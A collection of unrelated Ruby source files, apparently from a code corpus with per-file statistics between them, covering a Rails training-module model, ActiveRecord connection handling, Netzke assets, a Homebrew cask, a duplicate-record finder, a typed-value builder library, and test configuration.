# id :bigint(8) not null, primary key
# name :string(255)
# estimated_ttc :string(255)
# wiki_page :string(255)
# slide_slugs :text(65535)
# description :text(65535)
# translations :text(16777215)
# slug :string(255)
# created_at :datetime not null
# updated_at :datetime not null
#
require_dependency "#{Rails.root}/lib/training/training_base"
#= Class representing an individual training module
class TrainingModule < ApplicationRecord
attr_accessor :status
serialize :slide_slugs, Array
serialize :translations, Hash
validates :slug, uniqueness: true
def self.path_to_yaml
"#{base_path}/modules/*.yml"
end
def self.wiki_base_page
ENV['training_modules_wiki_page']
end
def self.trim_id_from_filename
false
end
def self.load
TrainingBase.load(content_class: self)
end
def self.base_path
TrainingBase.base_path
end
def self.load_all
TrainingBase.load_all
end
# This reloads all the library and module content, but only updates the slides
# for the module with the given slug.
def self.reload_module(slug:)
# First reload the libraries and modules so we have the new list of slugs
# and can load slides for brand-new modules.
TrainingLibrary.load
TrainingModule.load
# Reload the requested module's slides
training_module = TrainingModule.find_by(slug: slug)
raise ModuleNotFound, "No module #{slug} found!" unless training_module
TrainingSlide.load(slug_list: training_module.slide_slugs)
end
def self.inflate(content, slug, wiki_page = nil) # rubocop:disable Metrics/MethodLength
training_module = TrainingModule.find_or_initialize_by(id: content['id'])
training_module.slug = slug
training_module.name = content['name'] || content[:name]
training_module.description = content['description'] || content[:description]
training_module.estimated_ttc = content['estimated_ttc']
training_module.translations = content['translations']
training_module.wiki_page = wiki_page
training_module.slide_slugs = content['slides'].pluck('slug')
valid = training_module.valid?
if training_module.errors[:slug].any?
raise TrainingBase::DuplicateSlugError,
"Duplicate TrainingModule slug detected: #{slug}"
end
training_module.save if valid
training_module
rescue StandardError, TypeError => e # rubocop:disable Lint/ShadowedException
puts "There's a problem with file '#{slug}'"
raise e
end
####################
# Instance methods #
####################
def slides
return @sorted_slides if @sorted_slides.present?
selected_slides = TrainingSlide.where(slug: slide_slugs)
@sorted_slides = selected_slides.sort do |a, b|
slide_slugs.index(a.slug) <=> slide_slugs.index(b.slug)
end
end
def translated_name
translated(:name) || name
end
def translated_description
translated(:description) || description
end
def translated(key)
translations.dig(I18n.locale.to_s, key)
end
class ModuleNotFound < StandardError; end
end
| 28.901786 | 89 | 0.703429 |
1a760508723bd1c9f2ffac981fdce34197d6eadd | 9,951 | require 'set'
module ActiveRecord
class Base
class ConnectionSpecification #:nodoc:
attr_reader :config, :adapter_method
def initialize (config, adapter_method)
@config, @adapter_method = config, adapter_method
end
end
# Check for activity after at least +verification_timeout+ seconds.
# Defaults to 0 (always check.)
cattr_accessor :verification_timeout, :instance_writer => false
@@verification_timeout = 0
# The class -> [adapter_method, config] map
@@defined_connections = {}
# The class -> thread id -> adapter cache. (class -> adapter if not allow_concurrency)
@@active_connections = {}
class << self
# Retrieve the connection cache.
def thread_safe_active_connections #:nodoc:
@@active_connections[Thread.current.object_id] ||= {}
end
def single_threaded_active_connections #:nodoc:
@@active_connections
end
# pick up the right active_connection method from @@allow_concurrency
if @@allow_concurrency
alias_method :active_connections, :thread_safe_active_connections
else
alias_method :active_connections, :single_threaded_active_connections
end
# set concurrency support flag (not thread safe, like most of the methods in this file)
def allow_concurrency=(threaded) #:nodoc:
logger.debug "allow_concurrency=#{threaded}" if logger
return if @@allow_concurrency == threaded
clear_all_cached_connections!
@@allow_concurrency = threaded
method_prefix = threaded ? "thread_safe" : "single_threaded"
sing = (class << self; self; end)
[:active_connections, :scoped_methods].each do |method|
sing.send(:alias_method, method, "#{method_prefix}_#{method}")
end
log_connections if logger
end
def active_connection_name #:nodoc:
@active_connection_name ||=
if active_connections[name] || @@defined_connections[name]
name
elsif self == ActiveRecord::Base
nil
else
superclass.active_connection_name
end
end
def clear_active_connection_name #:nodoc:
@active_connection_name = nil
subclasses.each { |klass| klass.clear_active_connection_name }
end
# Returns the connection currently associated with the class. This can
# also be used to "borrow" the connection to do database work unrelated
# to any of the specific Active Records.
def connection
if @active_connection_name && (conn = active_connections[@active_connection_name])
conn
else
# retrieve_connection sets the cache key.
conn = retrieve_connection
active_connections[@active_connection_name] = conn
end
end
# Clears the cache which maps classes to connections.
def clear_active_connections!
clear_cache!(@@active_connections) do |name, conn|
conn.disconnect!
end
end
# Clears the cache which maps classes
def clear_reloadable_connections!
@@active_connections.each do |name, conn|
if conn.requires_reloading?
conn.disconnect!
@@active_connections.delete(name)
end
end
end
# Verify active connections.
def verify_active_connections! #:nodoc:
if @@allow_concurrency
remove_stale_cached_threads!(@@active_connections) do |name, conn|
conn.disconnect!
end
end
active_connections.each_value do |connection|
connection.verify!(@@verification_timeout)
end
end
private
def clear_cache!(cache, thread_id = nil, &block)
if cache
if @@allow_concurrency
thread_id ||= Thread.current.object_id
thread_cache, cache = cache, cache[thread_id]
return unless cache
end
cache.each(&block) if block_given?
cache.clear
end
ensure
if thread_cache && @@allow_concurrency
thread_cache.delete(thread_id)
end
end
# Remove stale threads from the cache.
def remove_stale_cached_threads!(cache, &block)
stale = Set.new(cache.keys)
Thread.list.each do |thread|
stale.delete(thread.object_id) if thread.alive?
end
stale.each do |thread_id|
clear_cache!(cache, thread_id, &block)
end
end
def clear_all_cached_connections!
if @@allow_concurrency
@@active_connections.each_value do |connection_hash_for_thread|
connection_hash_for_thread.each_value {|conn| conn.disconnect! }
connection_hash_for_thread.clear
end
else
@@active_connections.each_value {|conn| conn.disconnect! }
end
@@active_connections.clear
end
end
# Returns the connection currently associated with the class. This can
# also be used to "borrow" the connection to do database work that isn't
# easily done without going straight to SQL.
def connection
self.class.connection
end
# Establishes the connection to the database. Accepts a hash as input where
# the :adapter key must be specified with the name of a database adapter (in lower-case)
# example for regular databases (MySQL, Postgresql, etc):
#
# ActiveRecord::Base.establish_connection(
# :adapter => "mysql",
# :host => "localhost",
# :username => "myuser",
# :password => "mypass",
# :database => "somedatabase"
# )
#
# Example for SQLite database:
#
# ActiveRecord::Base.establish_connection(
# :adapter => "sqlite",
# :database => "path/to/dbfile"
# )
#
# Also accepts keys as strings (for parsing from yaml for example):
# ActiveRecord::Base.establish_connection(
# "adapter" => "sqlite",
# "database" => "path/to/dbfile"
# )
#
# The exceptions AdapterNotSpecified, AdapterNotFound and ArgumentError
# may be returned on an error.
def self.establish_connection(spec = nil)
case spec
when nil
raise AdapterNotSpecified unless defined? RAILS_ENV
establish_connection(RAILS_ENV)
when ConnectionSpecification
clear_active_connection_name
@active_connection_name = name
@@defined_connections[name] = spec
when Symbol, String
if configuration = configurations[spec.to_s]
establish_connection(configuration)
else
raise AdapterNotSpecified, "#{spec} database is not configured"
end
else
spec = spec.symbolize_keys
unless spec.key?(:adapter) then raise AdapterNotSpecified, "database configuration does not specify adapter" end
adapter_method = "#{spec[:adapter]}_connection"
unless respond_to?(adapter_method) then raise AdapterNotFound, "database configuration specifies nonexistent #{spec[:adapter]} adapter" end
remove_connection
establish_connection(ConnectionSpecification.new(spec, adapter_method))
end
end
# Locate the connection of the nearest super class. This can be an
# active or defined connections: if it is the latter, it will be
# opened and set as the active connection for the class it was defined
# for (not necessarily the current class).
def self.retrieve_connection #:nodoc:
# Name is nil if establish_connection hasn't been called for
# some class along the inheritance chain up to AR::Base yet.
if name = active_connection_name
if conn = active_connections[name]
# Verify the connection.
conn.verify!(@@verification_timeout)
elsif spec = @@defined_connections[name]
# Activate this connection specification.
klass = name.constantize
klass.connection = spec
conn = active_connections[name]
end
end
conn or raise ConnectionNotEstablished
end
# Returns true if a connection that's accessible to this class have already been opened.
def self.connected?
active_connections[active_connection_name] ? true : false
end
# Remove the connection for this class. This will close the active
# connection and the defined connection (if they exist). The result
# can be used as argument for establish_connection, for easy
# re-establishing of the connection.
def self.remove_connection(klass=self)
spec = @@defined_connections[klass.name]
konn = active_connections[klass.name]
@@defined_connections.delete_if { |key, value| value == spec }
active_connections.delete_if { |key, value| value == konn }
konn.disconnect! if konn
spec.config if spec
end
# Set the connection for the class.
def self.connection=(spec) #:nodoc:
if spec.kind_of?(ActiveRecord::ConnectionAdapters::AbstractAdapter)
active_connections[name] = spec
elsif spec.kind_of?(ConnectionSpecification)
config = spec.config.reverse_merge(:allow_concurrency => @@allow_concurrency)
self.connection = self.send(spec.adapter_method, config)
elsif spec.nil?
raise ConnectionNotEstablished
else
establish_connection spec
end
end
# connection state logging
def self.log_connections #:nodoc:
if logger
logger.info "Defined connections: #{@@defined_connections.inspect}"
logger.info "Active connections: #{active_connections.inspect}"
logger.info "Active connection name: #{@active_connection_name}"
end
end
end
end
| 35.539286 | 149 | 0.643654 |
8707a247f3884736cf02b36bd2781da89f1e2328 | 2,499 | module Netzke
module Core
module DynamicAssets
class << self
def ext_js(form_authenticity_token)
res = initial_dynamic_javascript(form_authenticity_token) << "\n"
include_base_js(res)
# Ext-specific JavaScript
res << File.new(File.expand_path("../../../../javascripts/ext.js", __FILE__)).read
# Pluggable JavaScript (used by other Netzke-powered gems like netzke-basepack)
Netzke::Core.ext_javascripts.each do |path|
f = File.new(path)
res << f.read
end
strip_js_comments(res)
end
def ext_css
res = File.new(File.expand_path("../../../../stylesheets/core.css", __FILE__)).read
# Pluggable stylesheets (may be used by other Netzke-powered gems like netzke-basepack)
Netzke::Core.ext_stylesheets.each do |path|
f = File.new(path)
res << f.read
end
res
end
def strip_js_comments(js_string)
if defined?(::Rails) && !::Rails.env.development? && compressor = ::Rails.application.assets.js_compressor
compressor.processor.call(nil, js_string)
else
js_string
end
end
private
# Generates initial javascript code that is dependent on Rails settings
def initial_dynamic_javascript(form_authenticity_token)
res = []
res << %(Ext.Ajax.extraParams = {authenticity_token: '#{form_authenticity_token}'}; // Rails' forgery protection)
res << %{Ext.ns('Netzke');}
res << %{Ext.ns('Netzke.core');}
res << %{Netzke.RelativeUrlRoot = '#{ActionController::Base.config.relative_url_root}';}
res << %{Netzke.ControllerUrl = '#{ActionController::Base.config.relative_url_root}#{Rails.application.routes.url_helpers.netzke_path('')}';}
res << %{Netzke.RelativeExtUrl = '#{ActionController::Base.config.relative_url_root}#{Netzke::Core.ext_uri}';}
res << %{Netzke.core.directMaxRetries = #{Netzke::Core.js_direct_max_retries};}
res.join("\n")
end
def include_base_js(arry)
# JavaScript extensions
arry << File.new(File.expand_path("../../../../javascripts/js_extensions.js", __FILE__)).read
# Base Netzke component JavaScript
arry << File.new(File.expand_path("../../../../javascripts/base.js", __FILE__)).read
end
end
end
end
end
| 35.197183 | 151 | 0.603041 |
d5522994990023dba35f541b838f782c2ad0ec43 | 38 | module Steep
VERSION = "0.49.1"
end
| 9.5 | 20 | 0.657895 |
6af0c34c18b5dee75eac12fba3e3c27cde1ecfe9 | 1,082 | cask "reaper" do
version "6.17.0,6.17"
if MacOS.version <= :mojave
sha256 "dff7839871a244f4d3343dd4f5386faace7a56f42df427df4d4995063a77f568"
url "https://www.reaper.fm/files/#{version.major}.x/reaper#{version.after_comma.no_dots}_x86_64.dmg"
else
sha256 "baaff9741d6982086aa2ec301014b11c8f4883c3bcfd3766016faad7b3bdb3f7"
url "https://www.reaper.fm/files/#{version.major}.x/reaper#{version.after_comma.no_dots}_x86_64_catalina.dmg"
end
appcast "https://www.cockos.com/reaper/latestversion/?p=osx_64",
must_contain: version.after_comma
name "REAPER"
desc "Digital audio production application"
homepage "https://www.reaper.fm/"
app "REAPER64.app"
app "ReaMote64.app"
zap trash: [
"~/Library/Application Support/REAPER",
"~/Library/Saved Application State/com.cockos.reaper.savedState",
"~/Library/Saved Application State/com.cockos.reaperhosti386.savedState",
"~/Library/Saved Application State/com.cockos.reaperhostx8664.savedState",
"~/Library/Saved Application State/com.cockos.ReaMote.savedState",
]
end
| 34.903226 | 113 | 0.748614 |
acd0bd1717131f9d39f5217e726a524397a6d151 | 2,457 | module Calagator
module DuplicateChecking
class DuplicateFinder < Struct.new(:model, :fields)
def find
scope = model.all
scope = yield(scope) if block_given?
scope = apply_query(scope) unless na?
group_by_fields(scope.to_a)
end
def fields
super.map(&:to_sym)
end
private
def na?
fields.empty? || fields == [:na]
end
def apply_query scope
scope = scope.select("#{model.table_name}.*")
scope.from!("#{model.table_name}, #{model.table_name} b")
scope.where!("#{model.table_name}.id <> b.id")
scope.where!("#{model.table_name}.duplicate_of_id" => nil)
scope.where!(query)
scope.distinct!
end
def query
case fields
when [:all] then query_from_all
when [:any] then query_from_any
else query_from_fields
end
end
def group_by_fields records
# Group by the field values we're matching on; skip any values for which we only have one record
records = records.group_by do |record|
Array(fields).map do |field|
record.read_attribute(field)
end
end
records.reject { |value, group| group.size <= 1 }
end
def query_from_all
attributes.map do |attr|
"((#{full_attr(attr)} = b.#{attr}) OR (#{full_attr(attr)} IS NULL AND b.#{attr} IS NULL))"
end.join(" AND ")
end
def query_from_any
attributes.map do |attr|
"(#{full_attr(attr)} = b.#{attr} AND (#{is_truthy_subquery(attr)}))"
end.join(" OR ")
end
def is_truthy_subquery(attr)
column = model.columns.find { |column| column.name.to_sym == attr }
query = case column.type
when :integer, :decimal then
"#{full_attr(attr)} != 0 AND "
when :string, :text
"#{full_attr(attr)} != '' AND "
end
"#{query}#{full_attr(attr)} IS NOT NULL"
end
def query_from_fields
raise ArgumentError, "Unknown fields: #{fields.inspect}" if (Array(fields) - attributes).any?
Array(fields).map do |attr|
"#{full_attr(attr)} = b.#{attr}"
end.join(" AND ")
end
def attributes
# TODO make :all pay attention to ignore fields
model.new.attribute_names.map(&:to_sym).reject do |attr|
[:id, :created_at, :updated_at, :duplicate_of_id, :version].include?(attr)
end
end
def full_attr(attr)
"#{model.table_name}.#{attr}"
end
end
end
end
| 26.419355 | 102 | 0.601954 |
4a77356c818b3c4ec92a219d5925d83735adae8f | 1,037 | =begin
#Selling Partner API for Merchant Fulfillment
#The Selling Partner API for Merchant Fulfillment helps you build applications that let sellers purchase shipping for non-Prime and Prime orders using Amazon’s Buy Shipping Services.
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AmzSpApi::MerchantFulfillmentV0::StandardIdForLabel
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'StandardIdForLabel' do
before do
# run before each test
@instance = AmzSpApi::MerchantFulfillmentV0::StandardIdForLabel.new
end
after do
# run after each test
end
describe 'test an instance of StandardIdForLabel' do
it 'should create an instance of StandardIdForLabel' do
expect(@instance).to be_instance_of(AmzSpApi::MerchantFulfillmentV0::StandardIdForLabel)
end
end
end
| 29.628571 | 182 | 0.784957 |
6250b8bedfa6718c1cc55db941cd6c1867af1896 | 263 | class AddCounterCacheColumnForRelatedContentLinks < ActiveRecord::Migration
def change
rename_column :contact_records, :websites_count, :contact_form_links_count
add_column :contact_records, :related_content_links_count, :integer, default: 0
end
end
| 32.875 | 83 | 0.825095 |
ff0120c6b99a5e959890d6f65a36c403106bc127 | 672 | #
# Cookbook:: apache2
# Recipe:: mod_authn_dbd
#
# Copyright:: 2013, OneHealth Solutions, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
apache2_module 'authn_dbd'
| 32 | 74 | 0.754464 |
8756b5e3b9f59310824c256e5a09bd606fcbf20b | 1,630 | require 'rails_helper'
module Genova
module Command
describe Executor do
let(:executor) { Command::Executor.new }
let(:io_mock) { double(IO) }
describe 'command' do
context 'when command was successful.' do
it 'should be return stdout' do
allow(io_mock).to receive(:write)
allow(io_mock).to receive(:close)
response = []
response << io_mock
response << ['stdout']
response << []
allow(Open3).to receive(:popen3).and_yield(*response)
expect(executor.command('dummy')).to eq('stdout')
end
end
context 'when command was failure.' do
it 'should be raise error' do
allow(io_mock).to receive(:write)
allow(io_mock).to receive(:close)
response = []
response << io_mock
response << ['stdout']
response << ['stderr']
allow(Open3).to receive(:popen3).and_yield(*response)
expect { executor.command('dummy') }.to raise_error(Exceptions::OutputError)
end
end
context 'when forcibly terminated' do
it 'should be raise error' do
allow(io_mock).to receive(:write)
allow(io_mock).to receive(:close)
response = []
response << io_mock
response << []
response << []
allow(Open3).to receive(:popen3).and_raise(Interrupt)
expect { executor.command('dummy') }.to raise_error(Interrupt)
end
end
end
end
end
end
| 28.103448 | 88 | 0.539877 |
abff51de79c3d17680b8f29588d425dc0380fddb | 3,617 | RSpec.describe 'Glueby::Contract::Timestamp' do
describe '#save!' do
subject { contract.save! }
let(:contract) do
Glueby::Contract::Timestamp.new(
wallet: wallet,
content: "\01",
prefix: ''
)
end
let(:wallet) { TestWallet.new(internal_wallet) }
let(:internal_wallet) { TestInternalWallet.new }
let(:unspents) do
[
{
txid: '5c3d79041ff4974282b8ab72517d2ef15d8b6273cb80a01077145afb3d5e7cc5',
script_pubkey: '76a914234113b860822e68f9715d1957af28b8f5117ee288ac',
vout: 0,
amount: 100_000_000,
finalized: false
}, {
txid: 'd49c8038943d37c2723c9c7a1c4ea5c3738a9bad5827ddc41e144ba6aef36db',
script_pubkey: '76a914234113b860822e68f9715d1957af28b8f5117ee288ac',
vout: 1,
amount: 100_000_000,
finalized: true
}, {
txid: '1d49c8038943d37c2723c9c7a1c4ea5c3738a9bad5827ddc41e144ba6aef36db',
script_pubkey: '76a914234113b860822e68f9715d1957af28b8f5117ee288ac',
vout: 2,
amount: 50_000_000,
finalized: true
}, {
txid: '864247cd4cae4b1f5bd3901be9f7a4ccba5bdea7db1d8bbd78b944da9cf39ef5',
vout: 0,
script_pubkey: '21c3eb2b846463430b7be9962843a97ee522e3dc0994a0f5e2fc0aa82e20e67fe893bc76a914bfeca7aed62174a7c60ebc63c7bd797bad46157a88ac',
amount: 1,
finalized: true
}, {
txid: 'f14b29639483da7c8d17b7b7515da4ff78b91b4b89434e7988ab1bc21ab41377',
vout: 0,
script_pubkey: '21c2dbbebb191128de429084246fa3215f7ccc36d6abde62984eb5a42b1f2253a016bc76a914fc688c091d91789ccda7a27bd8d88be9ae4af58e88ac',
amount: 100_000,
finalized: true
}, {
txid: '100c4dc65ea4af8abb9e345b3d4cdcc548bb5e1cdb1cb3042c840e147da72fa2',
vout: 0,
script_pubkey: '21c150ad685ec8638543b2356cb1071cf834fb1c84f5fa3a71699c3ed7167dfcdbb3bc76a9144f15d2203821d7ea719314126b79bd1e530fc97588ac',
amount: 100_000,
finalized: true
}, {
txid: 'a3f20bc94c8d77c35ba1770116d2b34375475a4194d15f76442636e9f77d50d9',
vout: 2,
script_pubkey: '21c150ad685ec8638543b2356cb1071cf834fb1c84f5fa3a71699c3ed7167dfcdbb3bc76a9144f15d2203821d7ea719314126b79bd1e530fc97588ac',
amount: 100_000,
finalized: true
}
]
end
let(:rpc) { double('mock') }
before do
allow(Glueby::Internal::RPC).to receive(:client).and_return(rpc)
allow(rpc).to receive(:getnewaddress).and_return('13L2GiUwB3HuyURm81ht6JiQAa8EcBN23H')
allow(internal_wallet).to receive(:list_unspent).and_return(unspents)
allow(internal_wallet).to receive(:broadcast).and_return('a01d8a6bf7bef5719ada2b7813c1ce4dabaf8eb4ff22791c67299526793b511c')
end
it { expect(subject).to eq 'a01d8a6bf7bef5719ada2b7813c1ce4dabaf8eb4ff22791c67299526793b511c' }
it 'create transaction' do
subject
expect(contract.tx.inputs.size).to eq 1
expect(contract.tx.outputs.size).to eq 2
expect(contract.tx.outputs[0].value).to eq 0
expect(contract.tx.outputs[0].script_pubkey.op_return?).to be_truthy
expect(contract.tx.outputs[0].script_pubkey.op_return_data.bth).to eq "4bf5122f344554c53bde2ebb8cd2b7e3d1600ad631c385a5d7cce23c7785459a"
expect(contract.tx.outputs[1].value).to eq 99_990_000
end
context 'if already broadcasted' do
before { contract.save! }
it { expect { subject }.to raise_error(Glueby::Contract::Errors::TxAlreadyBroadcasted) }
end
end
end
| 41.102273 | 148 | 0.699475 |
87fe2b9d300204d61b23e5663b8e4c80bec14222 | 1,040 | {
matrix_id: '1638',
name: 'tols2000',
group: 'Bai',
description: 'TOLOSA MATRIX',
author: 'S. Godet-Thobie',
editor: 'Z. Bai, D. Day, J. Demmel, J. Dongarra',
date: '1991',
kind: 'computational fluid dynamics problem',
problem_2D_or_3D: '1',
num_rows: '2000',
num_cols: '2000',
nonzeros: '5184',
num_explicit_zeros: '0',
num_strongly_connected_components: '1529',
num_dmperm_blocks: '1983',
structural_full_rank: 'true',
structural_rank: '2000',
pattern_symmetry: '0.339',
numeric_symmetry: '0.000',
rb_type: 'real',
structure: 'unsymmetric',
cholesky_candidate: 'no',
positive_definite: 'no',
norm: '5.963364e+06',
min_singular_value: '9.953124e-01',
condition_number: '5.991450e+06',
svd_rank: '2000',
sprank_minus_rank: '0',
null_space_dimension: '0',
full_numerical_rank: 'yes',
image_files: 'tols2000.png,tols2000_dmperm.png,tols2000_scc.png,tols2000_svd.png,tols2000_APlusAT_graph.gif,tols2000_graph.gif,',
}
| 30.588235 | 133 | 0.658654 |
6a81f7ac5848fed16a315dba5642060e1d7c7ccb | 5,133 | # mundi_api
#
# This file was automatically generated by APIMATIC v2.0 (
# https://apimatic.io ).
require 'date'
module MundiApi
# Response object for getting a customer
class GetCustomerResponse < BaseModel
# TODO: Write general description for this method
# @return [String]
attr_accessor :id
# TODO: Write general description for this method
# @return [String]
attr_accessor :name
# TODO: Write general description for this method
# @return [String]
attr_accessor :email
# TODO: Write general description for this method
# @return [Boolean]
attr_accessor :delinquent
# TODO: Write general description for this method
# @return [DateTime]
attr_accessor :created_at
# TODO: Write general description for this method
# @return [DateTime]
attr_accessor :updated_at
# TODO: Write general description for this method
# @return [String]
attr_accessor :document
# TODO: Write general description for this method
# @return [String]
attr_accessor :type
# TODO: Write general description for this method
# @return [String]
attr_accessor :fb_access_token
# TODO: Write general description for this method
# @return [GetAddressResponse]
attr_accessor :address
# TODO: Write general description for this method
# @return [Array<String, String>]
attr_accessor :metadata
# TODO: Write general description for this method
# @return [GetPhonesResponse]
attr_accessor :phones
# TODO: Write general description for this method
# @return [Long]
attr_accessor :fb_id
# Código de referência do cliente no sistema da loja. Max: 52 caracteres
# @return [String]
attr_accessor :code
# Código de referência do cliente no sistema da loja. Max: 52 caracteres
# @return [String]
attr_accessor :document_type
# A mapping from model property names to API property names.
def self.names
@_hash = {} if @_hash.nil?
@_hash['id'] = 'id'
@_hash['name'] = 'name'
@_hash['email'] = 'email'
@_hash['delinquent'] = 'delinquent'
@_hash['created_at'] = 'created_at'
@_hash['updated_at'] = 'updated_at'
@_hash['document'] = 'document'
@_hash['type'] = 'type'
@_hash['fb_access_token'] = 'fb_access_token'
@_hash['address'] = 'address'
@_hash['metadata'] = 'metadata'
@_hash['phones'] = 'phones'
@_hash['fb_id'] = 'fb_id'
@_hash['code'] = 'code'
@_hash['document_type'] = 'document_type'
@_hash
end
def initialize(id = nil,
name = nil,
email = nil,
delinquent = nil,
created_at = nil,
updated_at = nil,
document = nil,
type = nil,
fb_access_token = nil,
address = nil,
metadata = nil,
phones = nil,
code = nil,
document_type = nil,
fb_id = nil)
@id = id
@name = name
@email = email
@delinquent = delinquent
@created_at = created_at
@updated_at = updated_at
@document = document
@type = type
@fb_access_token = fb_access_token
@address = address
@metadata = metadata
@phones = phones
@fb_id = fb_id
@code = code
@document_type = document_type
end
# Creates an instance of the object from a hash.
def self.from_hash(hash)
return nil unless hash
# Extract variables from the hash.
id = hash['id']
name = hash['name']
email = hash['email']
delinquent = hash['delinquent']
created_at = APIHelper.rfc3339(hash['created_at']) if hash['created_at']
updated_at = APIHelper.rfc3339(hash['updated_at']) if hash['updated_at']
document = hash['document']
type = hash['type']
fb_access_token = hash['fb_access_token']
address = GetAddressResponse.from_hash(hash['address']) if
hash['address']
metadata = hash['metadata']
phones = GetPhonesResponse.from_hash(hash['phones']) if hash['phones']
code = hash['code']
document_type = hash['document_type']
fb_id = hash['fb_id']
# Create object from extracted values.
GetCustomerResponse.new(id,
name,
email,
delinquent,
created_at,
updated_at,
document,
type,
fb_access_token,
address,
metadata,
phones,
code,
document_type,
fb_id)
end
end
end
| 31.29878 | 79 | 0.543931 |
7af30a2f2e64f96960ac0e0157f814e47d406438 | 6,579 | # frozen_string_literal: true
require 'dry-logic'
require 'dry/logic/rule_compiler'
require 'dry/logic/predicates'
module Typed
module Builder
# Entrypoint
def self.any
AnyHandler.instance
end
Result = ::Struct.new(:ok, :value, :message)
class Result
attr_reader :ok, :value
def initialize(ok, value, message)
@ok = ok
@value = value
@failure_block = message
end
def message
@message ||= @failure_block.call
end
class << self
def success(value)
new(true, value, nil)
end
def failure(&failure_block)
new(false, nil, failure_block)
end
end
end
module BaseType
def nullable
Typed.null | self
end
def missable
Typed.value(Undefined) | self
end
def default(new_value = Typed::Undefined, &block)
call(new_value) unless block
block ||= -> { new_value }
DefaultType.new(self) { call(block.call) }
end
def instance(expected_class)
constrained(type: expected_class)
end
def enum(*values)
constrained(included_in: values.map { |value| call(value) })
end
def |(other)
expected_type other
SumType.new(self, other)
end
def constructor(input: Typed.any, swallow: [], &block)
expected_type(input)
return self unless block_given?
CoerceType.new(input, self, swallow, &block)
end
def constrained(**dry_options, &constraint)
base = constraint ? ConstrainedType.new(self, &constraint) : self
base = base.dry_constrained(**dry_options) unless dry_options.empty?
base
end
def call(*args)
result = process((args + [Typed::Undefined]).first)
return result.value if result.ok
raise InvalidValue, result.message
end
def process(value)
Typed::Builder::Result.success(value)
end
protected
def dry_constrained(**options)
predicate = ::Dry::Logic::RuleCompiler.new(::Dry::Logic::Predicates).call(
options.map { |key, val|
::Dry::Logic::Rule::Predicate.new(
::Dry::Logic::Predicates[:"#{key}?"]
).curry(val).to_ast
}
).reduce(:and)
constrained do |value|
"#{value.inspect} violates #{predicate}" unless predicate.call(value).success?
end
end
private
def expected_type(type)
raise InvalidType, "Not a Typed type: #{type.inspect}" unless type.is_a?(BaseType)
end
end
class ArrayType
include BaseType
def initialize(element_type)
@element_type = element_type
end
def process(value)
return Result.failure { "Invalid collection: #{value.inspect}" } unless value.respond_to?(:each)
new_value = []
value.each do |element|
element_result = element_type.process(element)
return element_result unless element_result.ok
new_value << element_result.value
end
Result.success(new_value)
end
private
attr_reader :base_type, :element_type
end
class ConstrainedType
include BaseType
def initialize(base_type, &constraint)
@base_type = base_type
@constraint = constraint
end
def process(value)
result = base_type.process(value)
return result unless result.ok
error = constraint.call(result.value)
return result unless error
Result.failure { error }
end
private
attr_reader :base_type, :constraint
end
class DefaultType
include BaseType
def initialize(base_type, &default_value)
@base_type = base_type
@default_value = default_value
end
def process(value)
new_value = Typed::Undefined.equal?(value) ? default_value.call : value
base_type.process(new_value)
end
private
attr_reader :default_value, :base_type
end
class SumType
include BaseType
def initialize(type_a, type_b)
@type_a = type_a
@type_b = type_b
end
def process(value)
result = type_a.process(value)
return result if result.ok
type_b.process(value)
end
private
attr_reader :type_a, :type_b
end
class CoerceType
include BaseType
def initialize(input_type, return_type, swallow, &coercion)
@input_type = input_type
@return_type = return_type
@coercion = coercion
@swallow = swallow
end
def process(value)
# No coercion needed
passthrough_result = return_type.process(value)
return passthrough_result if passthrough_result.ok
# Check input_type enables this coercion
input_result = input_type.process(value)
if input_result.ok
coerced_value =
begin
coercion.call(input_result.value)
rescue *swallow
input_result.value
end
return return_type.process(coerced_value)
end
passthrough_result
end
private
attr_reader :input_type, :return_type, :coercion, :swallow
end
end
end
| 27.4125 | 112 | 0.489132 |
b9152b2bb97c42a4bd1eb4d72a770267a7e7dcbb | 2,344 | require 'active_support/core_ext/integer/time'
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.cache_classes = false
config.action_view.cache_template_loading = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure public file server for tests with Cache-Control for performance.
config.public_file_server.enabled = true
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{1.hour.to_i}"
}
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.cache_store = :null_store
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Store uploaded files on the local file system in a temporary directory.
config.active_storage.service = :test
config.action_mailer.perform_caching = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raise exceptions for disallowed deprecations.
config.active_support.disallowed_deprecation = :raise
# Tell Active Support which deprecation messages to disallow.
config.active_support.disallowed_deprecation_warnings = []
# Raises error for missing translations.
# config.i18n.raise_on_missing_translations = true
# Annotate rendered view with file names.
# config.action_view.annotate_rendered_view_with_filenames = true
end
| 38.42623 | 85 | 0.780717 |
21532358aee8c5373c055badbdc44d3381a85c70 | 460 | require 'spec_helper'
describe Notification do
it { should belong_to(:user) }
it { should belong_to(:action_user) }
it { should belong_to(:notifiable) }
it { should_not allow_mass_assignment_of(:user_id) }
it { should_not allow_mass_assignment_of(:action_user_id) }
it { should_not allow_mass_assignment_of(:notifiable_type) }
it { should_not allow_mass_assignment_of(:notifiable_id) }
it { should_not allow_mass_assignment_of(:unread) }
end
| 32.857143 | 62 | 0.769565 |
f742692f4831902ba6098b4002ed84933af8848a | 538 | require 'test_helper'
require 'merge_sort'
require 'sort_strategy_test'
